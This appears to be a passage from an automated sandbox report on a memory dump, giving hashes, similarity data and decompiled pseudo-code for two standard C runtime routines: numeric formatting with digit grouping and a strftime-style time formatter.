Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D458EC0, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 433
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D458EC0(void* __ebx, void* __edi, void* __fp0, intOrPtr* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				char _v92;
				signed int _v96;
				intOrPtr* _v100;
				char _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed char _v128;
				signed int _v132;
				char* _v136;
				void* __esi;
				signed int _t204;
				signed int _t205;
				signed int _t210;
				intOrPtr* _t238;
				intOrPtr _t241;
				signed int _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t247;
				intOrPtr* _t251;
				intOrPtr* _t256;
				intOrPtr _t262;
				signed int _t267;
				signed int _t268;
				intOrPtr _t274;
				intOrPtr _t309;
				intOrPtr _t321;
				intOrPtr _t323;
				intOrPtr* _t324;
				intOrPtr _t327;
				intOrPtr _t330;
				intOrPtr* _t331;
				intOrPtr* _t332;
				intOrPtr _t334;
				intOrPtr* _t336;
				intOrPtr* _t337;
				signed int _t348;
				signed int _t350;
				intOrPtr _t358;
				intOrPtr* _t359;
				intOrPtr* _t360;
				intOrPtr _t361;
				intOrPtr* _t367;
				intOrPtr* _t368;
				void* _t369;
				intOrPtr* _t370;
				intOrPtr _t372;
				intOrPtr _t373;
				signed int _t374;
				signed char _t376;
				void* _t377;
				intOrPtr* _t379;
				signed int _t380;
				void* _t381;
				intOrPtr _t382;
				signed int _t383;
				signed int _t386;
				char* _t388;
				short* _t394;
				signed int _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				intOrPtr _t430;
				void* _t444;

				_t444 = __fp0;
				_t396 = _t398;
				_push(0xffffffff);
				_push(0x6d4fb782);
				_push( *[fs:0x0]);
				_t399 = _t398 - 0x64;
				_t204 =  *0x6d534074; // 0x286e79ba
				_t205 = _t204 ^ _t398;
				_v20 = _t205;
				_push(__ebx);
				_push(_t205);
				 *[fs:0x0] =  &_v16;
				_t323 = _a32;
				_t330 = _a20;
				_t379 = _a28;
				_v116 = _a8;
				_v84 = _t330;
				_v112 = _t379;
				_v108 = _t323;
				_v72 = 0;
				if(_t323 == 0) {
					L4:
					_t386 = 0;
					__eflags = 0;
				} else {
					_t321 =  *_t379;
					if(_t321 == 0x2b || _t321 == 0x2d) {
						_t386 = 1;
					} else {
						goto L4;
					}
				}
				_v96 = _t386;
				if(( *(_t330 + 0x14) & 0x00003000) == 0x3000) {
					_t14 = _t386 + 2; // 0x2
					_t210 = _t14;
					_t369 = 0x6d528600;
					__eflags = _t210 - _t323;
					if(_t210 <= _t323) {
						__eflags =  *((char*)(_t379 + _t386)) - 0x30;
						if( *((char*)(_t379 + _t386)) == 0x30) {
							_t330 =  *((intOrPtr*)(_t379 + _t386 + 1));
							__eflags = _t330 - 0x78;
							if(_t330 == 0x78) {
								L11:
								_t386 = _t210;
								_v96 = _t386;
							} else {
								__eflags = _t330 - 0x58;
								if(_t330 == 0x58) {
									goto L11;
								}
							}
						}
					}
				} else {
					_t369 = 0x6d5285fc;
				}
				_v104 = E6D4AB250(_t330, _t379, _t369);
				_v76 = 0x2e;
				_v76 =  *((intOrPtr*)( *((intOrPtr*)(E6D4B39AE(_t323, _t369, _t444)))));
				_t380 = E6D4AB250(_t330, _t379,  &_v76);
				_v8 = 0;
				_t331 =  *((intOrPtr*)( *((intOrPtr*)(_v84 + 0x30)) + 4));
				_v88 = _t331;
				_v80 = _t331;
				 *((intOrPtr*)( *_t331 + 4))();
				_v72 = 1;
				_push( &_v92);
				_v100 = E6D45D4D0(_t369, _t444);
				_t401 = _t399 + 0x14;
				_v72 = 1;
				_v72 = 0;
				_v8 = 0xffffffff;
				_t332 = _v80;
				if(_t332 != 0) {
					_t368 =  *((intOrPtr*)( *_t332 + 8))();
					if(_t368 != 0) {
						 *((intOrPtr*)( *_t368))(1);
					}
				}
				_v28 = 0;
				_v24 = 0;
				_v28 = 0;
				_v24 = 7;
				_v44 = 0;
				E6D45A6B0( &_v44, _t380, _t386, _t396, _t323, 0);
				_v8 = 1;
				_t334 = _v112;
				_t229 =  >=  ? _v44 :  &_v44;
				 *((intOrPtr*)( *_v100 + 0x2c))(_t334, _t334 + _t323,  >=  ? _v44 :  &_v44);
				_v8 = 2;
				_t336 =  *((intOrPtr*)( *((intOrPtr*)(_v84 + 0x30)) + 4));
				_v88 = _t336;
				_v100 = _t336;
				 *((intOrPtr*)( *_t336 + 4))();
				_v72 = _v72 | 0x00000002;
				_t238 = E6D45CB80(_t369, _t444,  &_v92);
				_v72 = _v72 & 0xfffffffd;
				_t402 = _t401 + 4;
				_t324 = _t238;
				_v8 = 1;
				_t337 = _v100;
				if(_t337 != 0) {
					_t367 =  *((intOrPtr*)( *_t337 + 8))();
					if(_t367 != 0) {
						 *((intOrPtr*)( *_t367))(1);
					}
				}
				E6D459D60( &_v68);
				_v8 = 3;
				_t241 =  *_t324;
				_t370 =  *((intOrPtr*)(_t241 + 0x10));
				if(_t241 != 0x6d503f60) {
					_t243 =  *_t370() & 0x0000ffff;
				} else {
					_t243 =  *(_t324 + 0xe) & 0x0000ffff;
				}
				_v80 = _t243;
				if(_t380 != _v108) {
					_t309 =  *_t324;
					if(_t309 != 0x6d503f60) {
						_t375 =  *((intOrPtr*)(_t309 + 0xc))() & 0x0000ffff;
					} else {
						_t375 =  *(_t324 + 0xc) & 0x0000ffff;
					}
					_t312 =  >=  ? _v44 :  &_v44;
					 *(( >=  ? _v44 :  &_v44) + _t380 * 2) = _t375;
				}
				_t381 =  ==  ? _v104 : _t380;
				_t326 =  >=  ? _v68 :  &_v68;
				_t244 =  *_t326;
				if(_t244 == 0x7f) {
					L35:
					_t245 = _v84;
					_t327 = _v28;
					_t430 =  *((intOrPtr*)(_t245 + 0x24));
					_t382 =  *((intOrPtr*)(_t245 + 0x20));
					if(_t430 < 0 || _t430 <= 0 && _t382 == 0 || _t382 <= _t327) {
						_t383 = 0;
						__eflags = 0;
					} else {
						_t383 = _t382 - _t327;
					}
					_t247 =  *(_t245 + 0x14) & 0x000001c0;
					if(_t247 == 0x40) {
						__eflags = _v24 - 8;
						_push(_t386);
						_t249 =  >=  ? _v44 :  &_v44;
						_t251 = E6D458910(_a4,  &_v92, _a12, _a16,  >=  ? _v44 :  &_v44);
						_t403 = _t402 + 0x18;
					} else {
						if(_t247 == 0x100) {
							__eflags = _v24 - 8;
							_push(_t386);
							_t280 =  >=  ? _v44 :  &_v44;
							_t359 = E6D458910(_a4,  &_v92, _a12, _a16,  >=  ? _v44 :  &_v44);
							_push(_t383);
							_a12 =  *_t359;
							_a16 =  *((intOrPtr*)(_t359 + 4));
							_t251 = E6D458890(_a4,  &_v92,  *_t359,  *((intOrPtr*)(_t359 + 4)), _a24);
							_t403 = _t402 + 0x30;
							_t383 = 0;
						} else {
							_push(_t383);
							_t360 = E6D458890(_a4,  &_v92, _a12, _a16, _a24);
							_t383 = 0;
							_push(_t386);
							_a12 =  *_t360;
							_a16 =  *((intOrPtr*)(_t360 + 4));
							_t291 =  >=  ? _v44 :  &_v44;
							_t251 = E6D458910(_a4,  &_v92,  *_t360,  *((intOrPtr*)(_t360 + 4)),  >=  ? _v44 :  &_v44);
							_t403 = _t402 + 0x30;
						}
					}
					_a12 =  *_t251;
					_t253 =  >=  ? _v44 :  &_v44;
					_push(_t327 - _t386);
					_t326 = _a4;
					_a16 =  *((intOrPtr*)(_t251 + 4));
					_t256 = E6D458910(_a4,  &_v92,  *_t251,  *((intOrPtr*)(_t251 + 4)), ( >=  ? _v44 :  &_v44) + _t386 * 2);
					_t372 = _v84;
					_t386 = _v116;
					_push(_t383);
					_a12 =  *_t256;
					_a16 =  *((intOrPtr*)(_t256 + 4));
					 *((intOrPtr*)(_t372 + 0x20)) = 0;
					 *((intOrPtr*)(_t372 + 0x24)) = 0;
					E6D458890(_a4, _t386,  *_t256,  *((intOrPtr*)(_t256 + 4)), _a24);
					_t404 = _t403 + 0x30;
					_v8 = 1;
					_t373 = _v48;
					if(_t373 < 0x10) {
						L50:
						_v52 = 0;
						_v48 = 0xf;
						_v68 = 0;
						_v8 = 0xffffffff;
						_t374 = _v24;
						if(_t374 < 8) {
							L54:
							_v28 = 0;
							_v44 = 0;
							_v24 = 7;
							 *[fs:0x0] = _v16;
							return E6D4903E3(_v20 ^ _t396);
						} else {
							_t347 = _v44;
							_t375 = 2 + _t374 * 2;
							_t262 = _t347;
							if(_t375 < 0x1000) {
								L53:
								_push(_t375);
								E6D490AE3(_t347);
								goto L54;
							} else {
								_t347 =  *((intOrPtr*)(_t347 - 4));
								_t375 = _t375 + 0x23;
								if(_t262 - _t347 + 0xfffffffc > 0x1f) {
									goto L57;
								} else {
									goto L53;
								}
							}
						}
					} else {
						_t358 = _v68;
						_t377 = _t373 + 1;
						_t274 = _t358;
						if(_t377 < 0x1000) {
							L49:
							_push(_t377);
							E6D490AE3(_t358);
							_t404 = _t404 + 8;
							goto L50;
						} else {
							_t347 =  *((intOrPtr*)(_t358 - 4));
							_t375 = _t377 + 0x23;
							if(_t274 -  *((intOrPtr*)(_t358 - 4)) + 0xfffffffc > 0x1f) {
								goto L56;
							} else {
								goto L49;
							}
						}
					}
				} else {
					asm("o16 nop [eax+eax]");
					while(_t244 > 0) {
						_t361 = _t244;
						if(_t361 >= _t381 - _t386) {
							goto L35;
						} else {
							_t383 = _t381 - _t361;
							_t347 = _v28;
							if(_t347 < _t383) {
								E6D45A990(_t347, __eflags);
								L56:
								E6D4B40D8(_t326, _t347, _t375, _t383, __eflags);
								L57:
								E6D4B40D8(_t326, _t347, _t375, _t383, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t376 = _v128;
								_push(_t386);
								_t388 = _v136;
								 *_t388 = 0x25;
								_t182 = _t388 + 1; // 0x4d
								_t267 = _t182;
								__eflags = _t376 & 0x00000020;
								if((_t376 & 0x00000020) != 0) {
									 *_t267 = 0x2b;
									_t267 = _t267 + 1;
									__eflags = _t267;
								}
								__eflags = _t376 & 0x00000010;
								if((_t376 & 0x00000010) != 0) {
									 *_t267 = 0x23;
									_t267 = _t267 + 1;
									__eflags = _t267;
								}
								_t348 = _v132;
								 *_t267 = 0x2a2e;
								_t268 = _t267 + 2;
								__eflags = _t348;
								if(_t348 != 0) {
									 *_t268 = _t348;
									_t268 = _t268 + 1;
									__eflags = _t268;
								}
								_t350 = _t376 & 0x00003000;
								__eflags = _t376 & 0x00000004;
								if((_t376 & 0x00000004) == 0) {
									__eflags = _t350 - 0x2000;
									if(_t350 != 0x2000) {
										__eflags = _t350 - 0x3000;
										if(_t350 != 0x3000) {
											__eflags = _t350 - 0x1000;
											_t199 = _t350 != 0x1000;
											__eflags = _t199;
											 *_t268 = 0x65 + (_t350 & 0xffffff00 | _t199) * 2;
											 *(_t268 + 1) = 0;
											return _t388;
										} else {
											 *_t268 = 0x61;
											 *(_t268 + 1) = 0;
											return _t388;
										}
									} else {
										goto L70;
									}
								} else {
									__eflags = _t350 - 0x2000;
									if(_t350 == 0x2000) {
										L70:
										 *_t268 = 0x66;
										 *(_t268 + 1) = 0;
										return _t388;
									} else {
										__eflags = _t350 - 0x3000;
										if(_t350 != 0x3000) {
											__eflags = _t350 - 0x1000;
											_t192 = _t350 != 0x1000;
											__eflags = _t192;
											 *_t268 = 0x45 + (_t350 & 0xffffff00 | _t192) * 2;
											 *(_t268 + 1) = 0;
											return _t388;
										} else {
											 *_t268 = 0x41;
											 *(_t268 + 1) = 0;
											return _t388;
										}
									}
								}
							} else {
								_t375 = _v24;
								if(_v24 - _t347 < 1) {
									_push(_v80 & 0x0000ffff);
									_v104 = 0;
									E6D45DE50(_t326,  &_v44, _t383, _t386, _t396, 1, _v104, _t383, 1);
								} else {
									_t87 = _t347 + 1; // 0x1
									_v28 = _t87;
									_t304 =  >=  ? _v44 :  &_v44;
									_t394 = ( >=  ? _v44 :  &_v44) + _t383 * 2;
									_t95 = _t394 + 2; // 0x2
									E6D492570(_t95, _t394, 2 + (_t347 - _t383) * 2);
									_t402 = _t402 + 0xc;
									 *_t394 = _v80 & 0x0000ffff;
									_t386 = _v96;
								}
								_t103 = _t326 + 1; // 0x1
								_t301 =  <=  ? _t326 : _t103;
								_t326 =  <=  ? _t326 : _t103;
								_t244 =  *_t326;
								if(_t244 != 0x7f) {
									continue;
								} else {
									goto L35;
								}
							}
						}
						goto L74;
					}
					goto L35;
				}
				L74:
			}

0x6d458ec0
0x6d458ec1
0x6d458ec3
0x6d458ec5
0x6d458ed0
0x6d458ed1
0x6d458ed4
0x6d458ed9
0x6d458edb
0x6d458ede
0x6d458ee1
0x6d458ee5
0x6d458eeb
0x6d458ef1
0x6d458ef4
0x6d458ef7
0x6d458efa
0x6d458efd
0x6d458f00
0x6d458f03
0x6d458f0c
0x6d458f1f
0x6d458f1f
0x6d458f1f
0x6d458f0e
0x6d458f0e
0x6d458f12
0x6d458f18
0x00000000
0x00000000
0x00000000
0x6d458f12
0x6d458f29
0x6d458f31
0x6d458f3a
0x6d458f3a
0x6d458f3d
0x6d458f42
0x6d458f44
0x6d458f46
0x6d458f4a
0x6d458f4c
0x6d458f50
0x6d458f53
0x6d458f5a
0x6d458f5a
0x6d458f5c
0x6d458f55
0x6d458f55
0x6d458f58
0x00000000
0x00000000
0x6d458f58
0x6d458f53
0x6d458f4a
0x6d458f33
0x6d458f33
0x6d458f33
0x6d458f66
0x6d458f6e
0x6d458f7b
0x6d458f8b
0x6d458f8d
0x6d458f9a
0x6d458f9d
0x6d458fa0
0x6d458fa5
0x6d458fab
0x6d458fb2
0x6d458fb8
0x6d458fbb
0x6d458fc3
0x6d458fc9
0x6d458fcc
0x6d458fd3
0x6d458fd8
0x6d458fdf
0x6d458fe3
0x6d458fe9
0x6d458fe9
0x6d458fe3
0x6d458fed
0x6d458ff5
0x6d459000
0x6d459007
0x6d45900e
0x6d459012
0x6d459017
0x6d459025
0x6d459028
0x6d459037
0x6d45903a
0x6d459044
0x6d459047
0x6d45904a
0x6d45904f
0x6d459052
0x6d45905a
0x6d45905f
0x6d459063
0x6d459066
0x6d459068
0x6d45906c
0x6d459071
0x6d459078
0x6d45907c
0x6d459082
0x6d459082
0x6d45907c
0x6d45908a
0x6d45908f
0x6d459093
0x6d459095
0x6d45909d
0x6d4590a9
0x6d45909f
0x6d45909f
0x6d45909f
0x6d4590af
0x6d4590b4
0x6d4590b6
0x6d4590bd
0x6d4590cd
0x6d4590bf
0x6d4590bf
0x6d4590bf
0x6d4590d7
0x6d4590dd
0x6d4590dd
0x6d4590e1
0x6d4590ec
0x6d4590f0
0x6d4590f4
0x6d459199
0x6d459199
0x6d45919c
0x6d45919f
0x6d4591a3
0x6d4591a6
0x6d4591b6
0x6d4591b6
0x6d4591b2
0x6d4591b2
0x6d4591b2
0x6d4591bb
0x6d4591c3
0x6d459260
0x6d459267
0x6d459268
0x6d45927a
0x6d45927f
0x6d4591c9
0x6d4591ce
0x6d459218
0x6d45921f
0x6d459220
0x6d459237
0x6d459239
0x6d45923f
0x6d459245
0x6d459254
0x6d459259
0x6d45925c
0x6d4591d0
0x6d4591d0
0x6d4591e6
0x6d4591e8
0x6d4591ee
0x6d4591f1
0x6d4591f7
0x6d4591fd
0x6d45920e
0x6d459213
0x6d459213
0x6d4591ce
0x6d459288
0x6d459291
0x6d459297
0x6d459298
0x6d45929b
0x6d4592a9
0x6d4592ae
0x6d4592b1
0x6d4592b4
0x6d4592ba
0x6d4592c4
0x6d4592c7
0x6d4592ce
0x6d4592d5
0x6d4592da
0x6d4592dd
0x6d4592e1
0x6d4592e7
0x6d459315
0x6d459315
0x6d45931c
0x6d459323
0x6d459327
0x6d45932e
0x6d459334
0x6d459364
0x6d459366
0x6d45936d
0x6d459373
0x6d45937d
0x6d459395
0x6d459336
0x6d459336
0x6d459339
0x6d459340
0x6d459348
0x6d45935a
0x6d45935a
0x6d45935c
0x00000000
0x6d45934a
0x6d45934a
0x6d45934d
0x6d459358
0x00000000
0x00000000
0x00000000
0x00000000
0x6d459358
0x6d459348
0x6d4592e9
0x6d4592e9
0x6d4592ec
0x6d4592ed
0x6d4592f5
0x6d45930b
0x6d45930b
0x6d45930d
0x6d459312
0x00000000
0x6d4592f7
0x6d4592f7
0x6d4592fa
0x6d459305
0x00000000
0x00000000
0x00000000
0x00000000
0x6d459305
0x6d4592f5
0x6d4590fa
0x6d4590fa
0x6d459100
0x6d459108
0x6d459111
0x00000000
0x6d459117
0x6d459117
0x6d459119
0x6d45911e
0x6d459396
0x6d45939b
0x6d45939b
0x6d4593a0
0x6d4593a0
0x6d4593a5
0x6d4593a6
0x6d4593a7
0x6d4593a8
0x6d4593a9
0x6d4593aa
0x6d4593ab
0x6d4593ac
0x6d4593ad
0x6d4593ae
0x6d4593af
0x6d4593b0
0x6d4593b4
0x6d4593b5
0x6d4593b9
0x6d4593bc
0x6d4593bc
0x6d4593bf
0x6d4593c2
0x6d4593c4
0x6d4593c7
0x6d4593c7
0x6d4593c7
0x6d4593c8
0x6d4593cb
0x6d4593cd
0x6d4593d0
0x6d4593d0
0x6d4593d0
0x6d4593d1
0x6d4593d5
0x6d4593da
0x6d4593dd
0x6d4593df
0x6d4593e1
0x6d4593e3
0x6d4593e3
0x6d4593e3
0x6d4593e6
0x6d4593ec
0x6d4593ef
0x6d459427
0x6d45942d
0x6d45943b
0x6d459441
0x6d45944f
0x6d459455
0x6d459455
0x6d45945f
0x6d459461
0x6d459468
0x6d459443
0x6d459445
0x6d459447
0x6d45944e
0x6d45944e
0x00000000
0x00000000
0x00000000
0x6d4593f1
0x6d4593f1
0x6d4593f7
0x6d45942f
0x6d459431
0x6d459433
0x6d45943a
0x6d4593f9
0x6d4593f9
0x6d4593ff
0x6d45940d
0x6d459413
0x6d459413
0x6d45941d
0x6d45941f
0x6d459426
0x6d459401
0x6d459403
0x6d459405
0x6d45940c
0x6d45940c
0x6d4593ff
0x6d4593f7
0x6d459124
0x6d459124
0x6d45912e
0x6d459171
0x6d459175
0x6d45917e
0x6d459130
0x6d459130
0x6d459136
0x6d45913c
0x6d459142
0x6d45914d
0x6d459152
0x6d45915a
0x6d459160
0x6d459163
0x6d459163
0x6d459187
0x6d45918a
0x6d45918d
0x6d45918f
0x6d459193
0x00000000
0x00000000
0x00000000
0x00000000
0x6d459193
0x6d45911e
0x00000000
0x6d459111
0x00000000
0x6d459100
0x00000000

APIs

_strcspn.LIBCMT ref: 6D458F61
_strcspn.LIBCMT ref: 6D458F83

Strings

`?Pm, xrefs: 6D459098
`?Pm, xrefs: 6D4590B8

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID: `?Pm$`?Pm
API String ID: 3709121408-3637558579
Opcode ID: e539bfc676ecbbf7b42c80cc27a8b1d322e93496ebaecb0da51272df646d03be
Instruction ID: cdc08b6c4fb4c6ec558c9d71a6b2bfa10089b0865f177573e8907be7d36ae7c3
Opcode Fuzzy Hash: e539bfc676ecbbf7b42c80cc27a8b1d322e93496ebaecb0da51272df646d03be
Instruction Fuzzy Hash: 35F17AB1A04209DFDF00CFA8C884EEEBBB6FF49304F244169E519AB251D7329D55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B98FE, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6D4B98FE(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x6d534074; // 0x286e79ba
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E6D4C4956(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E6D4C4B4A(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E6D47AAFA(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E6D4903E3(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E6D4B8CC8(_t145, _t153, _t179, _v52, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E6D4B41F9())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E6D4C8161(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E6D4C8161(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
